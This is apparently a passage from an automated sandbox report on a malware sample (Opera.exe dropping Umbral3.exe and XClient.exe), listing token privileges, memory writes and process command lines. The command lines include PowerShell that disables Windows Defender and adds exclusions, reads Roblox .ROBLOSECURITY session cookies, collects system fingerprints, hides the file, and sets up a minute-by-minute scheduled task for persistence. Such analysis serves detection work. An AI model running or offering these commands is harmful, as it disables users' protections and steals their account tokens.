Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeSystemProfilePrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeSystemtimePrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeProfSingleProcessPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeSystemEnvironmentPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeRemoteShutdownPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeUndockPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeManageVolumePrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: 33 N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: 34 N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: 35 N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: 36 N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeSystemProfilePrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeSystemtimePrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeProfSingleProcessPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeSystemEnvironmentPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeRemoteShutdownPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of SendNotifyMessage

Description Indicator Process Target
N/A N/A C:\Program Files\Mozilla Firefox\firefox.exe N/A
N/A N/A C:\Program Files\Mozilla Firefox\firefox.exe N/A
N/A N/A C:\Program Files\Mozilla Firefox\firefox.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 1116 wrote to memory of 208 N/A C:\Users\Admin\AppData\Local\Temp\Opera.exe C:\Users\Admin\AppData\Local\Temp\Umbral3.exe
PID 1116 wrote to memory of 208 N/A C:\Users\Admin\AppData\Local\Temp\Opera.exe C:\Users\Admin\AppData\Local\Temp\Umbral3.exe
PID 1116 wrote to memory of 3172 N/A C:\Users\Admin\AppData\Local\Temp\Opera.exe C:\Users\Admin\AppData\Local\Temp\XClient.exe
PID 1116 wrote to memory of 3172 N/A C:\Users\Admin\AppData\Local\Temp\Opera.exe C:\Users\Admin\AppData\Local\Temp\XClient.exe
PID 208 wrote to memory of 2840 N/A C:\Users\Admin\AppData\Local\Temp\Umbral3.exe C:\Windows\SYSTEM32\attrib.exe
PID 208 wrote to memory of 2840 N/A C:\Users\Admin\AppData\Local\Temp\Umbral3.exe C:\Windows\SYSTEM32\attrib.exe
PID 208 wrote to memory of 8 N/A C:\Users\Admin\AppData\Local\Temp\Umbral3.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 208 wrote to memory of 8 N/A C:\Users\Admin\AppData\Local\Temp\Umbral3.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 208 wrote to memory of 2128 N/A C:\Users\Admin\AppData\Local\Temp\Umbral3.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 208 wrote to memory of 2128 N/A C:\Users\Admin\AppData\Local\Temp\Umbral3.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 208 wrote to memory of 4844 N/A C:\Users\Admin\AppData\Local\Temp\Umbral3.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 208 wrote to memory of 4844 N/A C:\Users\Admin\AppData\Local\Temp\Umbral3.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 208 wrote to memory of 4852 N/A C:\Users\Admin\AppData\Local\Temp\Umbral3.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 208 wrote to memory of 4852 N/A C:\Users\Admin\AppData\Local\Temp\Umbral3.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 3172 wrote to memory of 2892 N/A C:\Users\Admin\AppData\Local\Temp\XClient.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 3172 wrote to memory of 2892 N/A C:\Users\Admin\AppData\Local\Temp\XClient.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 208 wrote to memory of 4384 N/A C:\Users\Admin\AppData\Local\Temp\Umbral3.exe C:\Windows\System32\Wbem\wmic.exe
PID 208 wrote to memory of 4384 N/A C:\Users\Admin\AppData\Local\Temp\Umbral3.exe C:\Windows\System32\Wbem\wmic.exe
PID 208 wrote to memory of 3800 N/A C:\Users\Admin\AppData\Local\Temp\Umbral3.exe C:\Windows\System32\Wbem\wmic.exe
PID 208 wrote to memory of 3800 N/A C:\Users\Admin\AppData\Local\Temp\Umbral3.exe C:\Windows\System32\Wbem\wmic.exe
PID 3172 wrote to memory of 1224 N/A C:\Users\Admin\AppData\Local\Temp\XClient.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 3172 wrote to memory of 1224 N/A C:\Users\Admin\AppData\Local\Temp\XClient.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 1880 wrote to memory of 4404 N/A C:\Program Files\Mozilla Firefox\firefox.exe C:\Program Files\Mozilla Firefox\firefox.exe
PID 1880 wrote to memory of 4404 N/A C:\Program Files\Mozilla Firefox\firefox.exe C:\Program Files\Mozilla Firefox\firefox.exe
PID 1880 wrote to memory of 4404 N/A C:\Program Files\Mozilla Firefox\firefox.exe C:\Program Files\Mozilla Firefox\firefox.exe
PID 1880 wrote to memory of 4404 N/A C:\Program Files\Mozilla Firefox\firefox.exe C:\Program Files\Mozilla Firefox\firefox.exe
PID 1880 wrote to memory of 4404 N/A C:\Program Files\Mozilla Firefox\firefox.exe C:\Program Files\Mozilla Firefox\firefox.exe
PID 1880 wrote to memory of 4404 N/A C:\Program Files\Mozilla Firefox\firefox.exe C:\Program Files\Mozilla Firefox\firefox.exe
PID 1880 wrote to memory of 4404 N/A C:\Program Files\Mozilla Firefox\firefox.exe C:\Program Files\Mozilla Firefox\firefox.exe
PID 1880 wrote to memory of 4404 N/A C:\Program Files\Mozilla Firefox\firefox.exe C:\Program Files\Mozilla Firefox\firefox.exe
PID 1880 wrote to memory of 4404 N/A C:\Program Files\Mozilla Firefox\firefox.exe C:\Program Files\Mozilla Firefox\firefox.exe
PID 1880 wrote to memory of 4404 N/A C:\Program Files\Mozilla Firefox\firefox.exe C:\Program Files\Mozilla Firefox\firefox.exe
PID 1880 wrote to memory of 4404 N/A C:\Program Files\Mozilla Firefox\firefox.exe C:\Program Files\Mozilla Firefox\firefox.exe
PID 208 wrote to memory of 1428 N/A C:\Users\Admin\AppData\Local\Temp\Umbral3.exe C:\Windows\System32\Wbem\wmic.exe
PID 208 wrote to memory of 1428 N/A C:\Users\Admin\AppData\Local\Temp\Umbral3.exe C:\Windows\System32\Wbem\wmic.exe
PID 4404 wrote to memory of 2268 N/A C:\Program Files\Mozilla Firefox\firefox.exe C:\Program Files\Mozilla Firefox\firefox.exe
PID 4404 wrote to memory of 2268 N/A C:\Program Files\Mozilla Firefox\firefox.exe C:\Program Files\Mozilla Firefox\firefox.exe
PID 4404 wrote to memory of 3648 N/A C:\Program Files\Mozilla Firefox\firefox.exe C:\Program Files\Mozilla Firefox\firefox.exe
PID 4404 wrote to memory of 3648 N/A C:\Program Files\Mozilla Firefox\firefox.exe C:\Program Files\Mozilla Firefox\firefox.exe
PID 4404 wrote to memory of 3648 N/A C:\Program Files\Mozilla Firefox\firefox.exe C:\Program Files\Mozilla Firefox\firefox.exe
PID 4404 wrote to memory of 3648 N/A C:\Program Files\Mozilla Firefox\firefox.exe C:\Program Files\Mozilla Firefox\firefox.exe
PID 4404 wrote to memory of 3648 N/A C:\Program Files\Mozilla Firefox\firefox.exe C:\Program Files\Mozilla Firefox\firefox.exe
PID 4404 wrote to memory of 3648 N/A C:\Program Files\Mozilla Firefox\firefox.exe C:\Program Files\Mozilla Firefox\firefox.exe
PID 4404 wrote to memory of 3648 N/A C:\Program Files\Mozilla Firefox\firefox.exe C:\Program Files\Mozilla Firefox\firefox.exe
PID 4404 wrote to memory of 3648 N/A C:\Program Files\Mozilla Firefox\firefox.exe C:\Program Files\Mozilla Firefox\firefox.exe
PID 4404 wrote to memory of 3648 N/A C:\Program Files\Mozilla Firefox\firefox.exe C:\Program Files\Mozilla Firefox\firefox.exe
PID 4404 wrote to memory of 3648 N/A C:\Program Files\Mozilla Firefox\firefox.exe C:\Program Files\Mozilla Firefox\firefox.exe
PID 4404 wrote to memory of 3648 N/A C:\Program Files\Mozilla Firefox\firefox.exe C:\Program Files\Mozilla Firefox\firefox.exe
PID 4404 wrote to memory of 3648 N/A C:\Program Files\Mozilla Firefox\firefox.exe C:\Program Files\Mozilla Firefox\firefox.exe
PID 4404 wrote to memory of 3648 N/A C:\Program Files\Mozilla Firefox\firefox.exe C:\Program Files\Mozilla Firefox\firefox.exe
PID 4404 wrote to memory of 3648 N/A C:\Program Files\Mozilla Firefox\firefox.exe C:\Program Files\Mozilla Firefox\firefox.exe
PID 4404 wrote to memory of 3648 N/A C:\Program Files\Mozilla Firefox\firefox.exe C:\Program Files\Mozilla Firefox\firefox.exe
PID 4404 wrote to memory of 3648 N/A C:\Program Files\Mozilla Firefox\firefox.exe C:\Program Files\Mozilla Firefox\firefox.exe
PID 4404 wrote to memory of 3648 N/A C:\Program Files\Mozilla Firefox\firefox.exe C:\Program Files\Mozilla Firefox\firefox.exe
PID 4404 wrote to memory of 3648 N/A C:\Program Files\Mozilla Firefox\firefox.exe C:\Program Files\Mozilla Firefox\firefox.exe
PID 4404 wrote to memory of 3648 N/A C:\Program Files\Mozilla Firefox\firefox.exe C:\Program Files\Mozilla Firefox\firefox.exe
PID 4404 wrote to memory of 3648 N/A C:\Program Files\Mozilla Firefox\firefox.exe C:\Program Files\Mozilla Firefox\firefox.exe
PID 4404 wrote to memory of 3648 N/A C:\Program Files\Mozilla Firefox\firefox.exe C:\Program Files\Mozilla Firefox\firefox.exe
PID 4404 wrote to memory of 3648 N/A C:\Program Files\Mozilla Firefox\firefox.exe C:\Program Files\Mozilla Firefox\firefox.exe
PID 4404 wrote to memory of 3648 N/A C:\Program Files\Mozilla Firefox\firefox.exe C:\Program Files\Mozilla Firefox\firefox.exe
PID 4404 wrote to memory of 3648 N/A C:\Program Files\Mozilla Firefox\firefox.exe C:\Program Files\Mozilla Firefox\firefox.exe
PID 4404 wrote to memory of 3648 N/A C:\Program Files\Mozilla Firefox\firefox.exe C:\Program Files\Mozilla Firefox\firefox.exe
PID 4404 wrote to memory of 3648 N/A C:\Program Files\Mozilla Firefox\firefox.exe C:\Program Files\Mozilla Firefox\firefox.exe
PID 4404 wrote to memory of 3648 N/A C:\Program Files\Mozilla Firefox\firefox.exe C:\Program Files\Mozilla Firefox\firefox.exe

Uses Task Scheduler COM API

persistence

Views/modifies file attributes

evasion

Description Indicator Process Target
N/A N/A C:\Windows\SYSTEM32\attrib.exe N/A
N/A N/A C:\Windows\SYSTEM32\attrib.exe N/A

Processes

C:\Users\Admin\AppData\Local\Temp\Opera.exe

"C:\Users\Admin\AppData\Local\Temp\Opera.exe"

C:\Users\Admin\AppData\Local\Temp\Umbral3.exe

"C:\Users\Admin\AppData\Local\Temp\Umbral3.exe"

C:\Users\Admin\AppData\Local\Temp\XClient.exe

"C:\Users\Admin\AppData\Local\Temp\XClient.exe"

C:\Windows\SYSTEM32\attrib.exe

"attrib.exe" +h +s "C:\Users\Admin\AppData\Local\Temp\Umbral3.exe"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Umbral3.exe'

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"powershell.exe" Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"powershell.exe" Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"powershell.exe" Get-ItemPropertyValue -Path HKLN:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\XClient.exe'

C:\Windows\System32\Wbem\wmic.exe

"wmic.exe" os get Caption

C:\Windows\System32\Wbem\wmic.exe

"wmic.exe" computersystem get totalphysicalmemory

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'XClient.exe'

C:\Program Files\Mozilla Firefox\firefox.exe

"C:\Program Files\Mozilla Firefox\firefox.exe"

C:\Program Files\Mozilla Firefox\firefox.exe

"C:\Program Files\Mozilla Firefox\firefox.exe"

C:\Windows\System32\Wbem\wmic.exe

"wmic.exe" csproduct get uuid

C:\Program Files\Mozilla Firefox\firefox.exe

"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="4404.0.785884306\520282606" -parentBuildID 20221007134813 -prefsHandle 1636 -prefMapHandle 1624 -prefsLen 20747 -prefMapSize 233444 -appDir "C:\Program Files\Mozilla Firefox\browser" - {b2b27ca1-1d07-4130-9b46-2d90e87c56e6} 4404 "\\.\pipe\gecko-crash-server-pipe.4404" 1720 1f2931f4d58 gpu

C:\Program Files\Mozilla Firefox\firefox.exe

"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="4404.1.114254307\1143745263" -parentBuildID 20221007134813 -prefsHandle 2096 -prefMapHandle 2092 -prefsLen 20828 -prefMapSize 233444 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {97135303-6f31-474e-b0de-7fc9643e4482} 4404 "\\.\pipe\gecko-crash-server-pipe.4404" 2108 1f292b41958 socket

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"powershell.exe" Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER

C:\Program Files\Mozilla Firefox\firefox.exe

"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="4404.2.135195726\1258005419" -childID 1 -isForBrowser -prefsHandle 2760 -prefMapHandle 2968 -prefsLen 20931 -prefMapSize 233444 -jsInitHandle 1284 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -appDir "C:\Program Files\Mozilla Firefox\browser" - {bf445491-c395-438b-a880-e3f76ce4fac5} 4404 "\\.\pipe\gecko-crash-server-pipe.4404" 2944 1f297197558 tab

C:\Program Files\Mozilla Firefox\firefox.exe

"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="4404.3.693188196\2020291680" -childID 2 -isForBrowser -prefsHandle 3424 -prefMapHandle 3408 -prefsLen 26109 -prefMapSize 233444 -jsInitHandle 1284 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -appDir "C:\Program Files\Mozilla Firefox\browser" - {ca22dd52-3dad-478c-90d1-935503a1fdcf} 4404 "\\.\pipe\gecko-crash-server-pipe.4404" 3452 1f287e61f58 tab

C:\Program Files\Mozilla Firefox\firefox.exe

"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="4404.4.2076861460\1814433807" -childID 3 -isForBrowser -prefsHandle 4304 -prefMapHandle 4296 -prefsLen 26168 -prefMapSize 233444 -jsInitHandle 1284 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -appDir "C:\Program Files\Mozilla Firefox\browser" - {f1d24509-16a4-4d4a-bc21-c7a99d73984d} 4404 "\\.\pipe\gecko-crash-server-pipe.4404" 4320 1f29921e358 tab

C:\Windows\System32\Wbem\wmic.exe

"wmic" path win32_VideoController get name

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming\Client.exe'

C:\Program Files\Mozilla Firefox\firefox.exe

"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="4404.5.784412914\1526721620" -childID 4 -isForBrowser -prefsHandle 4848 -prefMapHandle 4844 -prefsLen 26168 -prefMapSize 233444 -jsInitHandle 1284 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -appDir "C:\Program Files\Mozilla Firefox\browser" - {fc938f41-17fd-4a76-8870-7f37287291f8} 4404 "\\.\pipe\gecko-crash-server-pipe.4404" 4800 1f287e62258 tab

C:\Program Files\Mozilla Firefox\firefox.exe

"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="4404.6.141288439\352932363" -childID 5 -isForBrowser -prefsHandle 4928 -prefMapHandle 4932 -prefsLen 26168 -prefMapSize 233444 -jsInitHandle 1284 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -appDir "C:\Program Files\Mozilla Firefox\browser" - {76de6abc-bcb3-4468-ba5a-dcc2db041487} 4404 "\\.\pipe\gecko-crash-server-pipe.4404" 4884 1f299496758 tab

C:\Program Files\Mozilla Firefox\firefox.exe

"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="4404.7.319893757\1180504177" -childID 6 -isForBrowser -prefsHandle 5096 -prefMapHandle 5100 -prefsLen 26168 -prefMapSize 233444 -jsInitHandle 1284 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -appDir "C:\Program Files\Mozilla Firefox\browser" - {0c5b81f3-2add-45a9-8206-3932dd707e78} 4404 "\\.\pipe\gecko-crash-server-pipe.4404" 4912 1f299496a58 tab

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'Client.exe'

C:\Windows\SYSTEM32\cmd.exe

"cmd.exe" /c ping localhost && del /F /A h "C:\Users\Admin\AppData\Local\Temp\Umbral3.exe" && pause

C:\Windows\system32\PING.EXE

ping localhost

C:\Windows\System32\schtasks.exe

"C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "Client" /tr "C:\Users\Admin\AppData\Roaming\Client.exe"

C:\Program Files\Mozilla Firefox\firefox.exe

"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="4404.8.538590279\47800966" -childID 7 -isForBrowser -prefsHandle 6088 -prefMapHandle 6084 -prefsLen 26593 -prefMapSize 233444 -jsInitHandle 1284 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -appDir "C:\Program Files\Mozilla Firefox\browser" - {e2943164-ddd4-4e86-942c-e19c63f1db72} 4404 "\\.\pipe\gecko-crash-server-pipe.4404" 5540 1f29ae86e58 tab

C:\Program Files\Mozilla Firefox\firefox.exe

"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="4404.9.290925440\879106275" -childID 8 -isForBrowser -prefsHandle 4956 -prefMapHandle 4952 -prefsLen 26593 -prefMapSize 233444 -jsInitHandle 1284 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -appDir "C:\Program Files\Mozilla Firefox\browser" - {0a5e67f4-9c56-468d-825a-fecb32bd0cdb} 4404 "\\.\pipe\gecko-crash-server-pipe.4404" 6132 1f29ae87a58 tab

C:\Program Files\Mozilla Firefox\firefox.exe

"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="4404.10.1093434033\1828280291" -childID 9 -isForBrowser -prefsHandle 6216 -prefMapHandle 6240 -prefsLen 26593 -prefMapSize 233444 -jsInitHandle 1284 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -appDir "C:\Program Files\Mozilla Firefox\browser" - {7ce5add9-4239-41ba-9c63-2b03f8729b82} 4404 "\\.\pipe\gecko-crash-server-pipe.4404" 6316 1f29ae89e58 tab

C:\Program Files\Mozilla Firefox\firefox.exe

"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="4404.11.752001682\1145238142" -childID 10 -isForBrowser -prefsHandle 6500 -prefMapHandle 5016 -prefsLen 26768 -prefMapSize 233444 -jsInitHandle 1284 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -appDir "C:\Program Files\Mozilla Firefox\browser" - {70a45c95-38f3-4407-a532-a9cf137d2957} 4404 "\\.\pipe\gecko-crash-server-pipe.4404" 4992 1f29342f858 tab

C:\Users\Admin\AppData\Roaming\Client.exe

C:\Users\Admin\AppData\Roaming\Client.exe

C:\Program Files\Mozilla Firefox\firefox.exe

"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="4404.12.1289579916\1137941508" -childID 11 -isForBrowser -prefsHandle 5288 -prefMapHandle 6312 -prefsLen 26768 -prefMapSize 233444 -jsInitHandle 1284 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -appDir "C:\Program Files\Mozilla Firefox\browser" - {72cc7662-f316-4635-a009-a2a660b2e83d} 4404 "\\.\pipe\gecko-crash-server-pipe.4404" 5180 1f299ba9958 tab

C:\Program Files\Mozilla Firefox\firefox.exe

"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="4404.13.240442987\989605971" -childID 12 -isForBrowser -prefsHandle 3972 -prefMapHandle 2504 -prefsLen 26768 -prefMapSize 233444 -jsInitHandle 1284 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -appDir "C:\Program Files\Mozilla Firefox\browser" - {97f741b7-7816-4330-8aa9-1535bcb29030} 4404 "\\.\pipe\gecko-crash-server-pipe.4404" 5196 1f29ad29158 tab

C:\Program Files\Mozilla Firefox\firefox.exe

"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="4404.14.1661367114\708816911" -childID 13 -isForBrowser -prefsHandle 10296 -prefMapHandle 10292 -prefsLen 26768 -prefMapSize 233444 -jsInitHandle 1284 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -appDir "C:\Program Files\Mozilla Firefox\browser" - {976df849-95bd-455c-94fb-fd8854218b3a} 4404 "\\.\pipe\gecko-crash-server-pipe.4404" 10304 1f29b124258 tab

C:\Windows\System32\rundll32.exe

C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding

C:\Users\Admin\Downloads\Opera.exe

"C:\Users\Admin\Downloads\Opera.exe"

C:\Users\Admin\AppData\Local\Temp\Umbral3.exe

"C:\Users\Admin\AppData\Local\Temp\Umbral3.exe"

C:\Windows\SYSTEM32\attrib.exe

"attrib.exe" +h +s "C:\Users\Admin\AppData\Local\Temp\Umbral3.exe"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Umbral3.exe'

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"powershell.exe" Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"powershell.exe" Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"powershell.exe" Get-ItemPropertyValue -Path HKLN:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY

C:\Windows\System32\Wbem\wmic.exe

"wmic.exe" os get Caption

C:\Windows\System32\Wbem\wmic.exe

"wmic.exe" computersystem get totalphysicalmemory

C:\Windows\System32\Wbem\wmic.exe

"wmic.exe" csproduct get uuid

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"powershell.exe" Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER

C:\Windows\System32\Wbem\wmic.exe

"wmic" path win32_VideoController get name

C:\Windows\SYSTEM32\cmd.exe

"cmd.exe" /c ping localhost && del /F /A h "C:\Users\Admin\AppData\Local\Temp\Umbral3.exe" && pause

C:\Windows\system32\PING.EXE

ping localhost

C:\Users\Admin\AppData\Roaming\Client.exe

C:\Users\Admin\AppData\Roaming\Client.exe

C:\Users\Admin\AppData\Roaming\Client.exe

C:\Users\Admin\AppData\Roaming\Client.exe

C:\Windows\system32\AUDIODG.EXE

C:\Windows\system32\AUDIODG.EXE 0x2ec

C:\Users\Admin\AppData\Roaming\Client.exe

C:\Users\Admin\AppData\Roaming\Client.exe

C:\Users\Admin\AppData\Roaming\Client.exe

C:\Users\Admin\AppData\Roaming\Client.exe

C:\Program Files\Mozilla Firefox\firefox.exe

"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="4404.15.1886885090\1676064267" -childID 14 -isForBrowser -prefsHandle 10128 -prefMapHandle 2648 -prefsLen 27821 -prefMapSize 233444 -jsInitHandle 1284 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -appDir "C:\Program Files\Mozilla Firefox\browser" - {df02ce31-9c5d-4658-830f-0efacaa4ad29} 4404 "\\.\pipe\gecko-crash-server-pipe.4404" 6024 1f29af20458 tab

C:\Program Files\Mozilla Firefox\firefox.exe

"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="4404.16.967545651\1558656289" -childID 15 -isForBrowser -prefsHandle 10212 -prefMapHandle 10152 -prefsLen 27821 -prefMapSize 233444 -jsInitHandle 1284 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -appDir "C:\Program Files\Mozilla Firefox\browser" - {5496fa6d-b453-4e7b-972d-4dbf8ca616aa} 4404 "\\.\pipe\gecko-crash-server-pipe.4404" 10160 1f29b2d2d58 tab

C:\Program Files\Mozilla Firefox\firefox.exe

"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="4404.17.293763883\1533402784" -childID 16 -isForBrowser -prefsHandle 4432 -prefMapHandle 4436 -prefsLen 27821 -prefMapSize 233444 -jsInitHandle 1284 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -appDir "C:\Program Files\Mozilla Firefox\browser" - {547af0a8-3666-4dd3-986d-86e1e6c5cd0b} 4404 "\\.\pipe\gecko-crash-server-pipe.4404" 4324 1f29b2d3358 tab

C:\Program Files\Mozilla Firefox\firefox.exe

